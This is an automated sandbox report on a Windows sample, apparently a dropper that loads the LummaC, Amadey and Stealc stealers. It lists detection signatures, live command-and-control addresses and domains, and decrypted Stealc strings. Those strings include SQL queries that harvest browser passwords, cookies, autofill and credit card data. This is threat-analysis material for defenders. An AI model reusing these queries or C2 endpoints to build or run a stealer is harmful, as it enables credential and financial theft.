Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1545816
MD5: 7bd9ddf41cf8c2451e6e75242febfda1
SHA1: 94af38e810957befdd50512626f3aab2d1864598
SHA256: 97fd020744b762f6103a7712a182af2161557bae49cae9772c2a9b5ebad82513
Tags: exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
PE file has a writeable .text section
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to many different domains
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to detect virtual machines (SIDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 00000004.00000002.1946832633.0000000000471000.00000040.00000001.01000000.0000000C.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 28.2.num.exe.e80000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: 6cadd3f0fd.exe.7516.9.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["fadehairucw.store", "thumbystriw.store", "scriptyprefej.store", "founpiuer.store", "crisiwarny.store", "presticitpo.store", "navygenerayk.store", "necklacedmny.store"], "Build id": "4SD0y4--legendaryy"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\num[1].exe ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe ReversingLabs: Detection: 95%
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 39%
Source: file.exe Virustotal: Detection: 52% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.7% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\num[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\5TAVJ2XDPW30B3ZI4A9E75FX93.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 28.2.num.exe.e80000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 28.2.num.exe.e80000.0.unpack String decryptor: 30
Source: 28.2.num.exe.e80000.0.unpack String decryptor: 11
Source: 28.2.num.exe.e80000.0.unpack String decryptor: 20
Source: 28.2.num.exe.e80000.0.unpack String decryptor: 24
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetProcAddress
Source: 28.2.num.exe.e80000.0.unpack String decryptor: LoadLibraryA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: lstrcatA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: OpenEventA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: CreateEventA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: CloseHandle
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Sleep
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetUserDefaultLangID
Source: 28.2.num.exe.e80000.0.unpack String decryptor: VirtualAllocExNuma
Source: 28.2.num.exe.e80000.0.unpack String decryptor: VirtualFree
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetSystemInfo
Source: 28.2.num.exe.e80000.0.unpack String decryptor: VirtualAlloc
Source: 28.2.num.exe.e80000.0.unpack String decryptor: HeapAlloc
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetComputerNameA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: lstrcpyA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetProcessHeap
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetCurrentProcess
Source: 28.2.num.exe.e80000.0.unpack String decryptor: lstrlenA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: ExitProcess
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetSystemTime
Source: 28.2.num.exe.e80000.0.unpack String decryptor: SystemTimeToFileTime
Source: 28.2.num.exe.e80000.0.unpack String decryptor: advapi32.dll
Source: 28.2.num.exe.e80000.0.unpack String decryptor: gdi32.dll
Source: 28.2.num.exe.e80000.0.unpack String decryptor: user32.dll
Source: 28.2.num.exe.e80000.0.unpack String decryptor: crypt32.dll
Source: 28.2.num.exe.e80000.0.unpack String decryptor: ntdll.dll
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetUserNameA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: CreateDCA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetDeviceCaps
Source: 28.2.num.exe.e80000.0.unpack String decryptor: ReleaseDC
Source: 28.2.num.exe.e80000.0.unpack String decryptor: CryptStringToBinaryA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: sscanf
Source: 28.2.num.exe.e80000.0.unpack String decryptor: VMwareVMware
Source: 28.2.num.exe.e80000.0.unpack String decryptor: HAL9TH
Source: 28.2.num.exe.e80000.0.unpack String decryptor: JohnDoe
Source: 28.2.num.exe.e80000.0.unpack String decryptor: DISPLAY
Source: 28.2.num.exe.e80000.0.unpack String decryptor: %hu/%hu/%hu
Source: 28.2.num.exe.e80000.0.unpack String decryptor: http://185.215.113.206
Source: 28.2.num.exe.e80000.0.unpack String decryptor: bksvnsj
Source: 28.2.num.exe.e80000.0.unpack String decryptor: /6c4adf523b719729.php
Source: 28.2.num.exe.e80000.0.unpack String decryptor: /746f34465cf17784/
Source: 28.2.num.exe.e80000.0.unpack String decryptor: tale
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetFileAttributesA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GlobalLock
Source: 28.2.num.exe.e80000.0.unpack String decryptor: HeapFree
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetFileSize
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GlobalSize
Source: 28.2.num.exe.e80000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 28.2.num.exe.e80000.0.unpack String decryptor: IsWow64Process
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Process32Next
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetLocalTime
Source: 28.2.num.exe.e80000.0.unpack String decryptor: FreeLibrary
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetTimeZoneInformation
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetSystemPowerStatus
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetVolumeInformationA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Process32First
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetLocaleInfoA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetModuleFileNameA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: DeleteFileA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: FindNextFileA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: LocalFree
Source: 28.2.num.exe.e80000.0.unpack String decryptor: FindClose
Source: 28.2.num.exe.e80000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: LocalAlloc
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetFileSizeEx
Source: 28.2.num.exe.e80000.0.unpack String decryptor: ReadFile
Source: 28.2.num.exe.e80000.0.unpack String decryptor: SetFilePointer
Source: 28.2.num.exe.e80000.0.unpack String decryptor: WriteFile
Source: 28.2.num.exe.e80000.0.unpack String decryptor: CreateFileA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: FindFirstFileA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: CopyFileA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: VirtualProtect
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetLastError
Source: 28.2.num.exe.e80000.0.unpack String decryptor: lstrcpynA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: MultiByteToWideChar
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GlobalFree
Source: 28.2.num.exe.e80000.0.unpack String decryptor: WideCharToMultiByte
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GlobalAlloc
Source: 28.2.num.exe.e80000.0.unpack String decryptor: OpenProcess
Source: 28.2.num.exe.e80000.0.unpack String decryptor: TerminateProcess
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetCurrentProcessId
Source: 28.2.num.exe.e80000.0.unpack String decryptor: gdiplus.dll
Source: 28.2.num.exe.e80000.0.unpack String decryptor: ole32.dll
Source: 28.2.num.exe.e80000.0.unpack String decryptor: bcrypt.dll
Source: 28.2.num.exe.e80000.0.unpack String decryptor: wininet.dll
Source: 28.2.num.exe.e80000.0.unpack String decryptor: shlwapi.dll
Source: 28.2.num.exe.e80000.0.unpack String decryptor: shell32.dll
Source: 28.2.num.exe.e80000.0.unpack String decryptor: psapi.dll
Source: 28.2.num.exe.e80000.0.unpack String decryptor: rstrtmgr.dll
Source: 28.2.num.exe.e80000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 28.2.num.exe.e80000.0.unpack String decryptor: SelectObject
Source: 28.2.num.exe.e80000.0.unpack String decryptor: BitBlt
Source: 28.2.num.exe.e80000.0.unpack String decryptor: DeleteObject
Source: 28.2.num.exe.e80000.0.unpack String decryptor: CreateCompatibleDC
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GdipGetImageEncodersSize
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GdipGetImageEncoders
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GdiplusStartup
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GdiplusShutdown
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GdipSaveImageToStream
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GdipDisposeImage
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GdipFree
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetHGlobalFromStream
Source: 28.2.num.exe.e80000.0.unpack String decryptor: CreateStreamOnHGlobal
Source: 28.2.num.exe.e80000.0.unpack String decryptor: CoUninitialize
Source: 28.2.num.exe.e80000.0.unpack String decryptor: CoInitialize
Source: 28.2.num.exe.e80000.0.unpack String decryptor: CoCreateInstance
Source: 28.2.num.exe.e80000.0.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 28.2.num.exe.e80000.0.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 28.2.num.exe.e80000.0.unpack String decryptor: BCryptDecrypt
Source: 28.2.num.exe.e80000.0.unpack String decryptor: BCryptSetProperty
Source: 28.2.num.exe.e80000.0.unpack String decryptor: BCryptDestroyKey
Source: 28.2.num.exe.e80000.0.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetWindowRect
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetDesktopWindow
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetDC
Source: 28.2.num.exe.e80000.0.unpack String decryptor: CloseWindow
Source: 28.2.num.exe.e80000.0.unpack String decryptor: wsprintfA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: EnumDisplayDevicesA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetKeyboardLayoutList
Source: 28.2.num.exe.e80000.0.unpack String decryptor: CharToOemW
Source: 28.2.num.exe.e80000.0.unpack String decryptor: wsprintfW
Source: 28.2.num.exe.e80000.0.unpack String decryptor: RegQueryValueExA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: RegEnumKeyExA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: RegOpenKeyExA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: RegCloseKey
Source: 28.2.num.exe.e80000.0.unpack String decryptor: RegEnumValueA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: CryptBinaryToStringA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: CryptUnprotectData
Source: 28.2.num.exe.e80000.0.unpack String decryptor: SHGetFolderPathA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: ShellExecuteExA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: InternetOpenUrlA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: InternetConnectA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: InternetCloseHandle
Source: 28.2.num.exe.e80000.0.unpack String decryptor: InternetOpenA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: HttpSendRequestA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: HttpOpenRequestA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: InternetReadFile
Source: 28.2.num.exe.e80000.0.unpack String decryptor: InternetCrackUrlA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: StrCmpCA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: StrStrA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: StrCmpCW
Source: 28.2.num.exe.e80000.0.unpack String decryptor: PathMatchSpecA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: GetModuleFileNameExA
Source: 28.2.num.exe.e80000.0.unpack String decryptor: RmStartSession
Source: 28.2.num.exe.e80000.0.unpack String decryptor: RmRegisterResources
Source: 28.2.num.exe.e80000.0.unpack String decryptor: RmGetList
Source: 28.2.num.exe.e80000.0.unpack String decryptor: RmEndSession
Source: 28.2.num.exe.e80000.0.unpack String decryptor: sqlite3_open
Source: 28.2.num.exe.e80000.0.unpack String decryptor: sqlite3_prepare_v2
Source: 28.2.num.exe.e80000.0.unpack String decryptor: sqlite3_step
Source: 28.2.num.exe.e80000.0.unpack String decryptor: sqlite3_column_text
Source: 28.2.num.exe.e80000.0.unpack String decryptor: sqlite3_finalize
Source: 28.2.num.exe.e80000.0.unpack String decryptor: sqlite3_close
Source: 28.2.num.exe.e80000.0.unpack String decryptor: sqlite3_column_bytes
Source: 28.2.num.exe.e80000.0.unpack String decryptor: sqlite3_column_blob
Source: 28.2.num.exe.e80000.0.unpack String decryptor: encrypted_key
Source: 28.2.num.exe.e80000.0.unpack String decryptor: PATH
Source: 28.2.num.exe.e80000.0.unpack String decryptor: C:\ProgramData\nss3.dll
Source: 28.2.num.exe.e80000.0.unpack String decryptor: NSS_Init
Source: 28.2.num.exe.e80000.0.unpack String decryptor: NSS_Shutdown
Source: 28.2.num.exe.e80000.0.unpack String decryptor: PK11_GetInternalKeySlot
Source: 28.2.num.exe.e80000.0.unpack String decryptor: PK11_FreeSlot
Source: 28.2.num.exe.e80000.0.unpack String decryptor: PK11_Authenticate
Source: 28.2.num.exe.e80000.0.unpack String decryptor: PK11SDR_Decrypt
Source: 28.2.num.exe.e80000.0.unpack String decryptor: C:\ProgramData\
Source: 28.2.num.exe.e80000.0.unpack String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 28.2.num.exe.e80000.0.unpack String decryptor: browser:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: profile:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: url:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: login:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: password:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Opera
Source: 28.2.num.exe.e80000.0.unpack String decryptor: OperaGX
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Network
Source: 28.2.num.exe.e80000.0.unpack String decryptor: cookies
Source: 28.2.num.exe.e80000.0.unpack String decryptor: .txt
Source: 28.2.num.exe.e80000.0.unpack String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 28.2.num.exe.e80000.0.unpack String decryptor: TRUE
Source: 28.2.num.exe.e80000.0.unpack String decryptor: FALSE
Source: 28.2.num.exe.e80000.0.unpack String decryptor: autofill
Source: 28.2.num.exe.e80000.0.unpack String decryptor: SELECT name, value FROM autofill
Source: 28.2.num.exe.e80000.0.unpack String decryptor: history
Source: 28.2.num.exe.e80000.0.unpack String decryptor: SELECT url FROM urls LIMIT 1000
Source: 28.2.num.exe.e80000.0.unpack String decryptor: cc
Source: 28.2.num.exe.e80000.0.unpack String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 28.2.num.exe.e80000.0.unpack String decryptor: name:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: month:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: year:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: card:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Cookies
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Login Data
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Web Data
Source: 28.2.num.exe.e80000.0.unpack String decryptor: History
Source: 28.2.num.exe.e80000.0.unpack String decryptor: logins.json
Source: 28.2.num.exe.e80000.0.unpack String decryptor: formSubmitURL
Source: 28.2.num.exe.e80000.0.unpack String decryptor: usernameField
Source: 28.2.num.exe.e80000.0.unpack String decryptor: encryptedUsername
Source: 28.2.num.exe.e80000.0.unpack String decryptor: encryptedPassword
Source: 28.2.num.exe.e80000.0.unpack String decryptor: guid
Source: 28.2.num.exe.e80000.0.unpack String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 28.2.num.exe.e80000.0.unpack String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 28.2.num.exe.e80000.0.unpack String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 28.2.num.exe.e80000.0.unpack String decryptor: cookies.sqlite
Source: 28.2.num.exe.e80000.0.unpack String decryptor: formhistory.sqlite
Source: 28.2.num.exe.e80000.0.unpack String decryptor: places.sqlite
Source: 28.2.num.exe.e80000.0.unpack String decryptor: plugins
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Local Extension Settings
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Sync Extension Settings
Source: 28.2.num.exe.e80000.0.unpack String decryptor: IndexedDB
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Opera Stable
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Opera GX Stable
Source: 28.2.num.exe.e80000.0.unpack String decryptor: CURRENT
Source: 28.2.num.exe.e80000.0.unpack String decryptor: chrome-extension_
Source: 28.2.num.exe.e80000.0.unpack String decryptor: _0.indexeddb.leveldb
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Local State
Source: 28.2.num.exe.e80000.0.unpack String decryptor: profiles.ini
Source: 28.2.num.exe.e80000.0.unpack String decryptor: chrome
Source: 28.2.num.exe.e80000.0.unpack String decryptor: opera
Source: 28.2.num.exe.e80000.0.unpack String decryptor: firefox
Source: 28.2.num.exe.e80000.0.unpack String decryptor: wallets
Source: 28.2.num.exe.e80000.0.unpack String decryptor: %08lX%04lX%lu
Source: 28.2.num.exe.e80000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 28.2.num.exe.e80000.0.unpack String decryptor: ProductName
Source: 28.2.num.exe.e80000.0.unpack String decryptor: x32
Source: 28.2.num.exe.e80000.0.unpack String decryptor: x64
Source: 28.2.num.exe.e80000.0.unpack String decryptor: %d/%d/%d %d:%d:%d
Source: 28.2.num.exe.e80000.0.unpack String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 28.2.num.exe.e80000.0.unpack String decryptor: ProcessorNameString
Source: 28.2.num.exe.e80000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 28.2.num.exe.e80000.0.unpack String decryptor: DisplayName
Source: 28.2.num.exe.e80000.0.unpack String decryptor: DisplayVersion
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Network Info:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: - IP: IP?
Source: 28.2.num.exe.e80000.0.unpack String decryptor: - Country: ISO?
Source: 28.2.num.exe.e80000.0.unpack String decryptor: System Summary:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: - HWID:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: - OS:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: - Architecture:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: - UserName:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: - Computer Name:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: - Local Time:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: - UTC:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: - Language:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: - Keyboards:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: - Laptop:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: - Running Path:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: - CPU:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: - Threads:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: - Cores:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: - RAM:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: - Display Resolution:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: - GPU:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: User Agents:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Installed Apps:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: All Users:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Current User:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Process List:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: system_info.txt
Source: 28.2.num.exe.e80000.0.unpack String decryptor: freebl3.dll
Source: 28.2.num.exe.e80000.0.unpack String decryptor: mozglue.dll
